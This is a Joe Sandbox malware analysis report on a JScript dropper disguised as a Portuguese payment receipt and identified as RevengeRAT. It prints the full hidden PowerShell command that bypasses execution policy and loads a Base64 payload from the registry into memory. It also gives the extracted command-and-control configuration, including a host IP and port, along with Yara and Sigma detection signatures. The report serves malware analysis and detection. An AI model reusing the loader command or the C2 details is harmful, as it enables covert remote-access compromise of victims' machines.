Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
comprovante de pagamento.js

Overview

General Information

Sample name:comprovante de pagamento.js
Analysis ID:1578395
MD5:0c3e47c0fb0d5a289fded25fd9746817
SHA1:2117b82b1724a2f146ffd015b50ce45c63d7fb87
SHA256:2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d
Tags:jsRevengeRATuser-abuse_ch
Infos:

Detection

RevengeRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected RevengeRAT
Bypasses PowerShell execution policy
Found RAT behaviour (information extraction to be send to C&C)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6756 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: RevengeRAT

{"Host": ["38.51.135.44"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "9822cb7521c94057", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RevengeRATYara detected RevengeRATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
      00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_Revengerat_db91bcc6unknownunknown
      • 0x2e27:$a1: Revenge-RAT
      • 0x2b5a:$a2: SELECT * FROM FirewallProduct
      • 0x2d55:$a3: HKEY_CURRENT_USER\SOFTWARE\
      • 0x246f:$a4: get_MachineName
      00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_RevengeRATRevengeRAT and variants payloadditekSHen
      • 0x1e45:$l1: Lime.Connection
      • 0x1ec2:$l2: Lime.Packets
      • 0x1ed6:$l3: Lime.Settings
      • 0x1ea1:$l4: Lime.NativeMethods
      • 0x1fec:$s1: GetAV
      • 0x2ad6:$s2: keepAlivePing!
      • 0x2e27:$s3: Revenge-RAT
      • 0x22eb:$s6: set_SendBufferSize
      • 0x2b1c:$q1: Select * from AntiVirusProduct
      • 0x2b5a:$q2: SELECT * FROM FirewallProduct
      • 0x2bdc:$q3: select * from Win32_Processor
      00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
        00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Revengerat_db91bcc6unknownunknown
        • 0xb97b7:$a1: Revenge-RAT
        • 0x19ebfc:$a1: Revenge-RAT
        • 0xb94ea:$a2: SELECT * FROM FirewallProduct
        • 0x1d82e4:$a2: SELECT * FROM FirewallProduct
        • 0xb96e5:$a3: HKEY_CURRENT_USER\SOFTWARE\
        • 0xb8dff:$a4: get_MachineName
        Click to see the 5 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.powershell.exe.1768164d990.1.unpackJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
          1.2.powershell.exe.176f6380000.2.raw.unpackJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
            1.2.powershell.exe.1768164d990.1.unpackWindows_Trojan_Revengerat_db91bcc6unknownunknown
            • 0x1027:$a1: Revenge-RAT
            • 0xd5a:$a2: SELECT * FROM FirewallProduct
            • 0xf55:$a3: HKEY_CURRENT_USER\SOFTWARE\
            • 0x66f:$a4: get_MachineName
            1.2.powershell.exe.176f6380000.2.raw.unpackWindows_Trojan_Revengerat_db91bcc6unknownunknown
            • 0x2e27:$a1: Revenge-RAT
            • 0x2b5a:$a2: SELECT * FROM FirewallProduct
            • 0x2d55:$a3: HKEY_CURRENT_USER\SOFTWARE\
            • 0x246f:$a4: get_MachineName
            1.2.powershell.exe.1768164d990.1.unpackMALWARE_Win_RevengeRATRevengeRAT and variants payloadditekSHen
            • 0xcd6:$s2: keepAlivePing!
            • 0x1027:$s3: Revenge-RAT
            • 0x4eb:$s6: set_SendBufferSize
            • 0xd1c:$q1: Select * from AntiVirusProduct
            • 0xd5a:$q2: SELECT * FROM FirewallProduct
            • 0xddc:$q3: select * from Win32_Processor
            Click to see the 13 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ProcessId: 6756, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ProcessId: 6756, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T16:42:37.253666+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            2024-12-19T16:43:07.252902+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            2024-12-19T16:43:37.257973+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            2024-12-19T16:43:51.502758+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            2024-12-19T16:43:55.674603+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            2024-12-19T16:43:55.862048+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            2024-12-19T16:44:11.610122+010020358851Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T16:42:07.244342+010028411131Malware Command and Control Activity Detected192.168.2.44973038.51.135.44333TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: RevengeRAT {"Host": ["38.51.135.44"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "9822cb7521c94057", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}
            Yara detected RevengeRAT
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2841113 - Severity 1 - ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4 : 192.168.2.4:49730 -> 38.51.135.44:333
            Source: Network trafficSuricata IDS: 2035885 - Severity 1 - ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 : 192.168.2.4:49730 -> 38.51.135.44:333
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 38.51.135.44:333
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: unknownTCP traffic detected without corresponding DNS query: 38.51.135.44
            Source: powershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            E-Banking Fraud

            barindex
            Yara detected RevengeRAT
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: RevengeRAT and variants payload Author: ditekSHen
            Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C40011_2_00007FFD9B8C4001
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C4DB11_2_00007FFD9B8C4DB1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B8D181_2_00007FFD9B8B8D18
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C7B581_2_00007FFD9B8C7B58
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8D5F501_2_00007FFD9B8D5F50
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8BF67D1_2_00007FFD9B8BF67D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8EC5181_2_00007FFD9B8EC518
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C752D1_2_00007FFD9B8C752D
            Source: comprovante de pagamento.jsInitial sample: Strings found which are bigger than 50
